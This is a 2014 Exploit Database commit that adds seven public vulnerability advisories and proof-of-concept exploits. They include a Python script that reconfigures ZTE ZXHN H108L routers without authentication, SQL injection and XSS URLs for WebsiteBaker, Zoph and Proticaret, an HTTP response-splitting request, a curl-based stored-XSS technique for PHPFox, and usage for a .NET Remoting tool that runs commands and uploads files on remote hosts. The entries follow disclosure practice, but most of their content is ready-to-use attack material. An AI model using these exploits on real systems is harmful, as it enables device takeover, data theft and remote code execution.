From a28bed7356f7bf323e0d097e4be284da08fafaf0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 19 Nov 2014 04:49:39 +0000 Subject: [PATCH] Updated 11_19_2014 --- files.csv | 7 ++ platforms/hardware/webapps/35276.txt | 71 +++++++++++++++ platforms/osx/dos/35279.html | 127 +++++++++++++++++++++++++++ platforms/php/webapps/35274.txt | 80 +++++++++++++++++ platforms/php/webapps/35277.txt | 111 +++++++++++++++++++++++ platforms/php/webapps/35278.txt | 84 ++++++++++++++++++ platforms/windows/remote/35280.txt | 78 ++++++++++++++++ platforms/xml/webapps/35275.txt | 124 ++++++++++++++++++++++++++ 8 files changed, 682 insertions(+) create mode 100755 platforms/hardware/webapps/35276.txt create mode 100755 platforms/osx/dos/35279.html create mode 100755 platforms/php/webapps/35274.txt create mode 100755 platforms/php/webapps/35277.txt create mode 100755 platforms/php/webapps/35278.txt create mode 100755 platforms/windows/remote/35280.txt create mode 100755 platforms/xml/webapps/35275.txt diff --git a/files.csv b/files.csv index ee8d6dc1f..6b7f7a689 100755 --- a/files.csv +++ b/files.csv @@ -31767,3 +31767,10 @@ id,file,description,date,author,platform,type,port 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 +35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 +35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80 +35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80 +35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 +35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 +35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 +35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 diff --git a/platforms/hardware/webapps/35276.txt b/platforms/hardware/webapps/35276.txt new file mode 100755 index 000000000..2193b79a8 --- /dev/null +++ b/platforms/hardware/webapps/35276.txt @@ -0,0 +1,71 @@ +About the software +================== + +ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers. + +Vulnerability Details +===================== + +CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication. + +Affected Products +================= +Device model : ZTE ZXHN H108L +Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4 + +Proof of Concept +================ + +#!/usr/bin/python + +import requests + +acs_server = "http://:" +acs_user = "user" +acs_pass = "pass" + +# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination, +# router will connect back to the ACS server. + +conn_url = "/tr069" +conn_port = "7564" +conn_user = "user" +conn_pass = "pass" + +#Periodic inform parameters +active = 1 +interval = 2000 + +payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' } + +r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload) + +Impact +====== + +The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page. + +Severity +======== + +Medium + +References +========== + +https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/ + + +Disclosure Timeline +=================== + +27/10/2014 - First communication attempt to both vendor and ISP +04/11/2014 - ZTE response states that ISP should be contacted +03/11/2014 - Second attempt to contact the ISP. +14/11/2014 - No response from ISP. Public Disclosure + +Contact Information +=================== +Domain: https://projectzero.gr +Social: twitter.com/projectzerolabs +Contact: labs _at_ projectzero.gr \ No newline at end of file diff --git a/platforms/osx/dos/35279.html b/platforms/osx/dos/35279.html new file mode 100755 index 000000000..bbddcdc3c --- /dev/null +++ b/platforms/osx/dos/35279.html @@ -0,0 +1,127 @@ +@w3bd3vil + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/35274.txt b/platforms/php/webapps/35274.txt new file mode 100755 index 000000000..cc4bada64 --- /dev/null +++ b/platforms/php/webapps/35274.txt @@ -0,0 +1,80 @@ +# Exploit Title: PHPFox XSS AdminCP +# Date: 2014-10-22 +# Exploit Author: Wesley Henrique Leite aka "spyk2r" +# Vendor Homepage: http://www.moxi9.com +# Version: All version +# CVE : CVE-2014-8469 + +# Response Vendor: fixed 2014-10-23 (to v4 Beta) + +[+] DESCRIPTION + +The system stores all urls accessed in a database table, below +information in the same 'phpfox_log_session' + +[phpfox]> desc phpfox_log_session; ++---------------+----------------------+------+-----+---------+-------+ +| Field | Type | Null | Key | Default | Extra | ++---------------+----------------------+------+-----+---------+-------+ +++++++++++ more values and +| user_agent | varchar(100) | NO | | NULL | | ++---------------+----------------------+------+-----+---------+-------+ + +the column that can be manipulated is: +-> user_agent (100) + +all acess store in the system, such as bots and users wandering around the +web site, can be seen in: + +AdminCP +TOOLS > Online > Guests/Boots + +Output +| IP ADDRESS | User-Agent | ... + +knowing this, the following code was created to inject a script into the +AdminCP with User-Agent. + +$ curl -A "" \ + http://www.meusite.com.br/ + +OR + +$ curl -A "" http://www.meusite.com.br/ + +when any user with administrative access in. +'AdminCP' +TOOLS > Online > Guests/Boots + +we have the script running in the administrative area. + + +[+] My Solution + + (line 1.8) + + 1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php +Tue Oct 21 10:00:11 2014 -0200 + 1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php +Tue Oct 21 12:28:39 2014 -0200 + 1.3 @@ -25,7 +25,7 @@ + 1.4 {foreach from=$aGuests key=iKey item=aGuest} + 1.5 + 1.6 {$aGuest.ip_address} + 1.7 - {$aGuest.user_agent} + 1.8 + {$aGuest.user_agent|strip_tags} + 1.9 + 1.10
+ 1.11 {img +theme='misc/bullet_green.png' alt=''} + 1.12 @@ -43,4 +43,4 @@ + 1.13
+ 1.14 {phrase var='admincp.no_guests_online'} + 1.15
+ 1.16 -{/if} + 1.17 \ No newline at end of file + 1.18 +{/if} diff --git a/platforms/php/webapps/35277.txt b/platforms/php/webapps/35277.txt new file mode 100755 index 000000000..fb313cd4c --- /dev/null +++ b/platforms/php/webapps/35277.txt @@ -0,0 +1,111 @@ +============================================= +MGC ALERT 2014-004 +- Original release date: March 11, 2014 +- Last revised: November 18, 2014 +- Discovered by: Manuel Garcia Cardenas +- Severity: 10/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +Multiple Vulnerabilities in WebsiteBaker 2.8.3 + +II. BACKGROUND +------------------------- +WebsiteBaker helps you to create the website you want: A free, easy and +secure, flexible and extensible open source content management system (CMS). + +III. DESCRIPTION +------------------------- +It is possible to inject SQL code in the variable "id" on the page +"modify.php". This bug was found using the portal without authentication. +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. +Has been detected a reflected XSS vulnerability in WebsiteBaker, that +allows the execution of arbitrary HTML/script code to be executed in the +context of the victim user's browser. +An input validation problem exists within WebsiteBaker which allows +injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) +characters into the server HTTP response header, resulting in a HTTP +Response Splitting Vulnerability. + +IV. PROOF OF CONCEPT +------------------------- +SQL Injection: + +/wb/admin/pages/modify.php?page_id=1 + +Cross-Site Scripting GET: + +/wb/admin/admintools/tool.php?tool=captcha_control&6d442">8e3b12642a8=1 +/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1§ion_id=%007e3939f8a40a7355f9acf0 +/wb/modules/news/add_post.php?page_id=1§ion_id=f953a">4ddf3369c1f +/wb/modules/news/modify_group.php?page_id=1§ion_id=%008cf03">2680504c3ec&group_id=62be99873b33d1d3 +/wb/modules/news/modify_post.php?page_id=1§ion_id=%003874a4194d511605&post_id=db89943875a2db52 +/wb/modules/news/modify_settings.php?page_id=1§ion_id=%008b2f4">bdc8b3919b5 + +HTTP RESPONSE SPLITTING: + +If you enter a valid user and password, you can inject on the headers +malicious code, example. + +POST /wb/admin/login/index.php HTTP/1.1 +Content-Length: 204 +Content-Type: application/x-www-form-urlencoded +Referer: http://192.168.244.129:80/wb/ +Host: 127.0.0.1 +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/28.0.1500.63 Safari/537.36 +Accept: */* + +password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar& +url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponse + +You can inject a new header named: InjectedHeader:MaliciousCode because we +inject a CR&LF new line with %0d%0a%20. + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +WebsiteBaker <= 2.8.3 + +VII. SOLUTION +------------------------- +No news releases + +VIII. REFERENCES +------------------------- +http://www.websitebaker.org + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +March 11, 2014 1: Initial release + +XI. DISCLOSURE TIMELINE +------------------------- +March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas +March 11, 2014 2: Send to vendor +June 05, 2014 3: Second mail to the verdor without response +November 18, 2014 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/35278.txt b/platforms/php/webapps/35278.txt new file mode 100755 index 000000000..a9a10bfad --- /dev/null +++ b/platforms/php/webapps/35278.txt @@ -0,0 +1,84 @@ +============================================= +MGC ALERT 2014-005 +- Original release date: March 5, 2014 +- Last revised: November 18, 2014 +- Discovered by: Manuel Garcia Cardenas +- Severity: 10/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +Multiple Vulnerabilities in Zoph <= 0.9.1 + +II. BACKGROUND +------------------------- +Zoph (Zoph Organizes Photos) is a web based digital image presentation and +management system. In other words, a photo album. It is built with PHP, +MySQL and Perl. + +III. DESCRIPTION +------------------------- +It is possible to inject SQL code in the variables "id" and "action" on the +pages group, photos and user. This bug was found using the portal with +authentication. To exploit the vulnerability only is needed use the version +1.0 of the HTTP protocol to interact with the application. +Has been detected a reflected XSS vulnerability in Zoph, that allows the +execution of arbitrary HTML/script code to be executed in the context of +the victim user's browser. + +IV. PROOF OF CONCEPT +------------------------- +SQL Injection: + +/zoph/php/group.php?_action=1'%22&_clear_crumbs=1 +/zoph/php/photos.php?location_id=1'%22 +/zoph/php/user.php?user_id=&_action=1'%22 + +Cross-Site Scripting GET: + +/zoph/php/edit_photos.php?photographer_id=3"> +/zoph/php/edit_photos.php?album_id=2&_crumb=3"> + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Zoph <= 0.9.1 + +VII. SOLUTION +------------------------- +No news releases + +VIII. REFERENCES +------------------------- +http://www.zoph.org/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +March 11, 2014 1: Initial release + +XI. DISCLOSURE TIMELINE +------------------------- +March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas +March 5, 2014 2: Send to vendor +June 17, 2014 3: Second mail to the verdor without response +November 18, 2014 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/platforms/windows/remote/35280.txt b/platforms/windows/remote/35280.txt new file mode 100755 index 000000000..39daba63c --- /dev/null +++ b/platforms/windows/remote/35280.txt @@ -0,0 +1,78 @@ +Source: https://github.com/tyranid/ExploitRemotingService +Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip + +ExploitRemotingService (c) 2014 James Forshaw +============================================= + +A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. +It only works on Windows although some aspects _might_ work in Mono on *nix. + +Usage Instructions: +=================== + +ExploitRemotingService [options] uri command [command args] +Copyright (c) James Forshaw 2014 + +Uri: +The supported URI are as follows: +tcp://host:port/ObjName - TCP connection on host and portname +ipc://channel/ObjName - Named pipe channel + +Options: + + -s, --secure Enable secure mode + -p, --port=VALUE Specify the local TCP port to listen on + -i, --ipc=VALUE Specify listening pipe name for IPC channel + --user=VALUE Specify username for secure mode + --pass=VALUE Specify password for secure mode + --ver=VALUE Specify version number for remote, 2 or 4 + --usecom Use DCOM backchannel instead of .NET remoting + --remname=VALUE Specify the remote object name to register + -v, --verbose Enable verbose debug output + --useser Uses old serialization tricks, only works on + full type filter services + -h, -?, --help + +Commands: +exec [-wait] program [cmdline]: Execute a process on the hosting server +cmd cmdline : Execute a command line process and display stdou +t +put localfile remotefile : Upload a file to the hosting server +get remotefile localfile : Download a file from the hosting server +ls remotedir : List a remote directory +run file [args] : Upload and execute an assembly, calls entry point +user : Print the current username +ver : Print the OS version + +This tool supports exploit both TCP remoting services and local IPC services. To test +the exploit you need to know the name of the .NET remoting service and the port it's +listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find +this in the server or client code. Look for things like calls to: + +RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance + +You can then try the exploit by constructing an appropriate URL. If TCP you can use the +URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName. + +A simple test is to do: + +ExploitRemotingService SERVICEURL ver + +If successful it should print the OS version of the hosting .NET remoting service. If +you get an exception it might be fixed with CVE-2014-1806. At this point try the COM +version using: + +ExploitRemotingService -usecom SERVICEURL ver + +This works best locally but can work remotely if you modify the COM configuration and +disable the firewall you should be able to get it to work. If that still doesn't work +then it might be an up to date server. Instead you can also try the full serialization +version using. + +ExploitRemotingService -useser SERVICEURL ls c:\ + +For this to work the remoting service must be running with full typefilter mode enabled +(which is some, especially IPC services). It also only works with the commands ls, put +and get. But that should be enough to compromise a box. + +I've provided an example service to test against. \ No newline at end of file diff --git a/platforms/xml/webapps/35275.txt b/platforms/xml/webapps/35275.txt new file mode 100755 index 000000000..23ec94baf --- /dev/null +++ b/platforms/xml/webapps/35275.txt @@ -0,0 +1,124 @@ +Document Title: +============ +Proticaret E-Commerce Script v3.0 >= SQL Injection + +Release Date: +=========== +13 Nov 2014 + +Product & Service Introduction: +======================== +Proticaret is a free e-commerce script. + +Abstract Advisory Information: +======================= +BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0 + +Vulnerability Disclosure Timeline: +========================= +20 Oct 2014 : Contact with Vendor +20 Nov 2014 : Vendor Response +June 26, 2014 : Patch Released +13 Nov 2014 : Public Disclosure + +Discovery Status: +============= +Published + +Affected Product(s): +=============== +Promist Bilgi ?leti?im Teknolojileri A.? +Product: Proticaret E-commerce Script v3.0 >= + +Exploitation Technique: +================== +Remote, Unauthenticated + + +Severity Level: +=========== +Critical + +Technical Details & Description: +======================== +SQL Injection + +Proof of Concept (PoC): +================== +Proof of Concept + +Request: + + + + + + 1' from Users where (select top 1 password from users where userId=101)>1- - + + ? + + + + +Response: + + + + + soap:Server + +System.Web.Services.Protocols.SoapException: Server +was unable to process request. ---> +System.Data.SqlClient.SqlException: Conversion failed when converting +the nvarchar value 'secretpassword' to data type int. + at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) + +at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException +exception, Boolean breakConnection, Action`1 wrapCloseInAction) + at + +System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject +stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) + at +System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, +SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet +bulkCopyHandler, TdsParserStateObject stateObj, Boolean& +dataReady) + at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) + at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) + at System.Data.SqlClient.SqlDataReader.Read() + at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) + --- End of inner exception stack trace --- + + + + + + +Solution Fix & Patch: +================ +Apply the patch for v3.0 + +Security Risk: +========== +The risk of the vulnerabilities above estimated as critical. + +Credits & Authors: +============== +Bilgi Güvenli?i Akademisi + +Disclaimer & Information: +=================== +The +information provided in this advisory is provided as it is without any +warranty. BGA disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a +particular purpose. BGA or its suppliers are not liable in any case of +damage, including direct, indirect, incidental, consequential loss of +business profits or special damages. + +Domain: www.bga.com.tr +Social: twitter.com/bgasecurity +Contact: bilgi@bga.com.tr + +Copyright © 2014 | BGA \ No newline at end of file